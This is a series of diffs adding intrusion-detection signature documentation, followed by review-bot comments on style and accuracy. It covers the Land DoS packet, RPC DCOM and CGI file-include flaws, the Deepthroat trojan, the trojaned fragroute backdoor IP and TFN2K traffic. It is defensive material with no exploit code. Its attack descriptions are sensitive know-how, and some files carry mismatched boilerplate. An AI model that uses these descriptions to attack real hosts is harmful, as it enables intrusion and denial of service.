+The Land denial of service attack attempts to crash or disable a target 
+host by sending a spoofed TCP SYN packet with an identical source and 
+destination IP and identical source and destination port.  Some target 
+hosts will crash others will be temporarily disabled.  
+
+--
+Affected Systems:
+	Windows 95
+	Windows NT Any unpatched version 
+	SCO CMW+ 3.0
+	SCO Open Desktop/Open Server 3.0
+	SCO Open Server 5.0
+	SCO UnixWare 2.1.0
+	Gauntlet 3.2/HP-UX 10.10 and Gauntlet 4.1/HP-UX 10.20
+
+--
+Attack Scenarios:
+A malicious user crafts a packet to cause a Denial of Service against a 
+target host.
+
+--
+Ease of Attack:
+Simple to craft such a packet using any number of packet crafting tools 
+such as nmap and hping.
+
+
+--
+False Positives:
+None known.  This should have a very low likelihood of false positives.
+
+--
+False Negatives:
+The exploit code has an IP identification number and TCP sequence number
+of 3868.  If a user changes the source code to have a different IP 
+identification or TCP sequence number, the rule will not fire. 
+
+--
+Corrective Action:
+Malicious outside attacks can be prevented by configuring your 
+packet-filtering device to block packets from entering your network that
+have source IP's from your network address space. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+CAN-1999-0016
+
+CERT:
+CA-1997-28
+
+--
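Review bot: "source IP's from your network address space" in Corrective Action should be "source IPs", and "Some target hosts will crash others will be temporarily disabled" needs a comma or "while". Style: "Rule:" is followed directly by "--" without the blank line used in every other file. The False Negatives note that the rule keys on IP identification and TCP sequence number 3868 is useful and should stay; consider also saying in Detailed Information that the rule matches those exploit-specific values rather than the generic same-source-and-destination condition, since that is what limits its coverage.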
--- /dev/null
+++ b/doc/signatures/3412.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3412
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
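Review bot: this file is identical to 3224.txt except for the Sid, down to the "Expoit" typo and the empty Additional References; documenting two RPC DCOM rules with the same text leaves no way to tell what distinguishes sid 3412 from sid 3224 (a different port, request or vulnerability). State the specific condition each rule matches, fix the typo in both, and add the bulletin and CVE reference for each.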
--- /dev/null
+++ b/doc/signatures/100000587.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000587
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_backup.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "db_backup.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
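Review bot: Attack Scenarios describes credential attacks against "an authentication mechanism", which is unrelated to the remote file include in the "admin_template_path" parameter of "db_backup.php" that the Summary and Detailed Information describe; replace it with the actual scenario, a URL to an attacker-controlled file supplied in that parameter being included and executed by the script. Also "may indicate that an exploitation attempt has been attempted" is redundant ("that exploitation has been attempted"), "ona web server" should be "on a web server", and the last Detailed Information paragraph is generic CGI text that also appears verbatim in 1172.txt. Style: no blank line between the Sid and "--", and a stray empty line after the final "--".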
--- /dev/null
+++ b/doc/signatures/1172.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1172
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
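Review bot: "ona web server" in Detailed Information should be "on a web server", and the line "relationships between the victim server and other hosts can be exploited by the attacker." runs well past the wrap width the rest of the file uses. Substantively, the Summary ("a known vulnerability in a CGI web application") never names the script or request the rule matches, and Additional References is empty; add the specific CGI program and its advisory so the event can be triaged.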
--- /dev/null
+++ b/doc/signatures/1025.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1025
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS.
+
+This event indicates that an attempt has been made to access
+/scripts/perl on a web server. This may indicate that an attacker is
+attempting to run code of their choosing on that server.
+
+Perl should not be installed in a directory directly accessible via the
+Internet on a web server.
+
+--
+Affected Systems:
+	Any host using IIS with Active Perl installed.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Access to a webserver that stores web cgi scripts in /scripts/perl/ will
+generate events.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
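Review bot: Attack Scenarios ("An attacker can retrieve a sensitive file containing information on the IIS implementation") does not match Detailed Information, which says the rule fires on access to /scripts/perl and that the attacker is attempting to run code on the server; rewrite the scenario around executing Perl through a web-accessible interpreter directory. Impact "Information gathering possible administrator access." is missing punctuation between its two phrases. Corrective Action should also tell the reader to remove or relocate the Perl interpreter out of any web-accessible directory, which is the point Detailed Information makes ("Perl should not be installed in a directory directly accessible via the Internet") but the remediation list omits. Style: two blank lines under Additional References.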
--- /dev/null
+++ b/doc/signatures/1980.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1980
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
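Review bot: "add the Deepthroat sever" in Detailed Information is a typo for "server". The see-also list "sids 195, 1980, 1981, 1982 and 1983" includes this file's own sid (1980). The file omits the "Affected Systems:" section used by every other file and instead lists the operating systems under Detailed Information; move them into the standard section. In Corrective Action, "Systemtray" is a value under the listed HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ key rather than a key itself, so "Registry keys added are" should read "Registry values added are".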
--- /dev/null
+++ b/doc/signatures/535.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+535
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
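Review bot: "Windows adminsitrative shares" in Attack Scenarios is a typo for "administrative". The Summary and Detailed Information say access is gained "using Samba", but Affected Systems also lists "All systems using file and print sharing for Windows", which are not Samba; the rule concerns SMB share access regardless of implementation, so phrase it as "via SMB" and mention Samba as one affected implementation. Additional References is empty.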
--- /dev/null
+++ b/doc/signatures/2322.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2322
+
+--
+Summary:
+This event is generated when an attempt is made to access foxweb.dll, a 
+component of the FoxWeb CGI web application running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+The FoxWeb application is used to communicate with FoxPro databases. The
+program foxweb.exe contains an error that may allow an attacker to
+execute arbitrary code of their choosing and possibly gain unauthorized
+administrator access to the server.
+
+--
+Affected Systems:
+	FoxWeb 2.5 and prior
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator by supplying input of
+their choosing to the CGI program.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
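Review bot: the component name is inconsistent: the Summary says the rule fires on access to foxweb.dll, while Detailed Information attributes the flaw to "The program foxweb.exe". State which file the rule actually matches and which one carries the bug; the two may differ legitimately, but the text should say so. The Attack Scenarios line "An attacker can exploit weaknesses to gain access as the administrator by supplying input of" exceeds the wrap width used elsewhere in the file. Additional References is empty for a rule tied to a specific product version ("FoxWeb 2.5 and prior").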
--- /dev/null
+++ b/doc/signatures/1925.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1925
+
+--
+Summary:
+This event is generated when a request is made to Network File System (NFS) to list all exported file systems and to indicate which clients are permitted to mount each file system. 
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover exported NFS file systems and client mount permissions.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of exported file systems and client mount permissions.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to list the exported NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list exported NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS26
+
+
+--
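Review bot: "The mountd Remote Procedure Call (RPC) implements the NFS mount protocol" misdescribes mountd, which is an RPC service (a daemon), not an RPC; suggest "The mountd RPC service implements the NFS mount protocol". In Corrective Action, "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" is ambiguous about direction; read "to deny access to RPC services from untrusted networks". Style: double spaces after full stops and the trailing spaces after "Simple." and "file." are inconsistent with the other files.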
--- /dev/null
+++ b/doc/signatures/1791.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+1791
+
+--
+Summary:
+This event indicates that a backdoor may be installed on a machine.
+
+--
+Impact:
+One of the systems may have been compromised.
+
+--
+Detailed Information:
+www.monkey.org, the system that hosts fragroute was compromised and the fragroute
+source code was modified to contain a back door.  The code was corrupted on 
+May 17, 2002.  Versions after May 31, 2002  and before May 17, 2002 do not contain the backdoor.
+
+--
+Affected Systems:
+
+Systems running
+	dsniff 2.3
+	fragroute 1.2
+	fragrouter 1.6
+
+--
+Attack Scenarios:
+The backdoor contacts the IP address 216.80.99.202.  A person connecting from that
+address can use the backdoor to acquire full control over the compromised machine.  
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+While the IP address flagged in this rule was associated with the backdoor at the time
+fragroute was trojaned, it may now or in the future be used by unrelated parties.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a new version of fragroute and sanitize the trojaned machine.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4898
+http://www.securityfocus.com/archive/1/274927
+
+
+
+
+
+
+--
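Review bot: Affected Systems lists "dsniff 2.3", "fragroute 1.2" and "fragrouter 1.6", but Detailed Information only describes the fragroute source being modified; either state that the other two packages distributed from www.monkey.org were trojaned in the same window, or narrow the list to fragroute, so a reader can tell which downloads the rule is about. The window sentence, "Versions after May 31, 2002  and before May 17, 2002 do not contain the backdoor.", has a double space and would read more naturally stated positively (only copies obtained between May 17 and May 31, 2002 contain the backdoor). False Positives correctly warns that 216.80.99.202 "may now or in the future be used by unrelated parties"; Corrective Action should therefore say to confirm the installed source is trojaned before sanitising the host. Minor: six blank lines precede the closing "--", "Rule:  " and "-- " carry trailing whitespace, and "Steven Alexander<alexander.s@mccd.edu>" is missing a space before the address.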
--- /dev/null
+++ b/doc/signatures/1640.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1640
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
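Review bot: Typo in Impact: "unkown" should be "unknown". This file omits the Affected Systems section that the other signature docs carry; for a policy rule something like "Any host running an IRC or instant messaging client" would fit, given that Additional References cites the IRC protocol. Summary says "network chat clients" generally while the only reference is IRC; naming the protocol the rule keys on would let an analyst judge the alert. Minor style: "Sid: 1640" is on one line here while the other files put the number on its own line after "Sid:", and the False Positives and False Negatives entries lack the trailing period used elsewhere.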
--- /dev/null
+++ b/doc/signatures/2233.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2233
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
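Review bot: Corrective Action recommends "Disable the web interface" and "Enable NTLM authentication for the administrative interface", but Detailed Information only says the overflow "could lead to remote access to the server" without stating that the vulnerable code is reached through the web administrative interface; add that sentence, otherwise the reader cannot see why those two measures mitigate the issue. Both items are also missing their trailing periods. Minor: "Rule:  " and the "-- " separator before Additional References carry trailing whitespace, and Summary's first line ends in a trailing space.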
--- /dev/null
+++ b/doc/signatures/100000568.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000568
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Qdig" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "post_gallery" parameter in the "index.php" 
+script used by the "Qdig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Qdig
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
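Review bot: Impact and the second Detailed Information paragraph are the remote-file-include boilerplate ("Possible execution of arbitrary code of the attackers choosing", "execute system binaries") and overstate what a cross site scripting flaw in the "post_gallery" parameter of "index.php" gives an attacker; the Attack Scenarios line, "An attacker can supply a malicious link designed to steal information from a user clicking on that link.", is the accurate description and Impact should be scaled to it (disclosure of the user's session or data in the browser context). "attackers choosing" needs an apostrophe. Structure: the blank line used before "--" everywhere else is missing after "100000568", after "All systems running CGI applications using Qdig" and after the contributor line, and a stray blank line follows the final "--".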
--- /dev/null
+++ b/doc/signatures/413.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+413
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP IPV6 Where-Are-You datagram.
+
+--
+
+Impact:
+ICMP Type 33 datagrams are not expected network traffic.  Hosts generating ICMP Type 33 datagrams should be investigated for hostile activity.
+
+--
+
+Detailed Information:
+ICMP Type 33 is an undocumented extension to RFC 1812 and RFC 792.  Its current use it not defined by an approved RFC.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Hosts generating ICMP Type 33 datagrams should be investigated for hostile activity.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
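Review bot: Typo in Detailed Information: "Its current use it not defined by an approved RFC." should read "is not defined". Ease of Attack, "Numerous tools and scripts can generate this type of ICMP datagram.", describes availability rather than ease; the other docs use "Simple." and that sentence belongs in Detailed Information. Additional References is "None" although Detailed Information cites RFC 1812 and RFC 792; listing them there gives the reader the context for Type 33. Minor: "IPV6" in Summary should be "IPv6", double spaces follow the periods in Impact and Detailed Information, and the blank line before "--" is missing after the False Negatives entry.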
--- /dev/null
+++ b/doc/signatures/100000425.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000425
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DotWidget CMS" application running on a webserver. Access to the file "printfriendly.php" using a remote file being passed as the "file_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "file_path" parameter in the "printfriendly.php" script used by the "DotWidget CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DotWidget CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
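Review bot: The third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server...") and the Attack Scenarios text ("An attacker can access an authentication mechanism and supply his/her own credentials to gain access.") are the generic CGI-credentials boilerplate and do not describe a remote file include through the "file_path" parameter of "printfriendly.php"; the first two paragraphs already cover the issue, so drop the third and reword Attack Scenarios to describe a crafted "file_path" value that makes the server include an externally hosted file. Typos: "running ona web server" should be "on a", "attackers choosing" needs an apostrophe, and "an exploitation attempt has been attempted" should be "an exploit has been attempted". Additional References is empty; cite the advisory the rule was written from. Two blank lines open the file and a stray one follows the final "--".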
--- /dev/null
+++ b/doc/signatures/1650.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1650
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
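Review bot: Summary says the rule covers "a known vulnerability in a CGI web application" without naming the script or the vulnerability; since sid 1650 matches one specific request, Summary and Detailed Information should name the script and Additional References (empty here) should cite the advisory, otherwise an analyst seeing the alert cannot judge whether the target is affected. Typo in Detailed Information: "running ona web server" should be "on a"; "attackers choosing" needs an apostrophe in Impact and Detailed Information; the line "relationships between the victim server and other hosts can be exploited by the attacker." runs past the wrap width used in the rest of the paragraph.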
--- /dev/null
+++ b/doc/signatures/222.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+222
+
+--
+Summary:
+This event is generated when ICMP traffic is sent between Tribe Flood Network 2000 (TFN2K) hosts.
+
+--
+Impact:
+Attempted DDoS. It is possible there is a TFN2K host in your network. 
+
+--
+Detailed Information:
+When TFN2K hosts communicate using ICMP, they may use an ICMP echo reply with an ICMP identification number of 0 and with a sequence of A's in the payload.  The tell-tale sequence of A's is a problem with the Base 64 encoding that was employed.   
+
+--
+Affected Systems:
+Any TFN2K infected host. 
+
+--
+Attack Scenarios:
+TFN2K hosts communicate with each other for various reasons for the ultimate purpose of attacking a target.
+
+--
+Ease of Attack:
+Simple. TFN2K is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
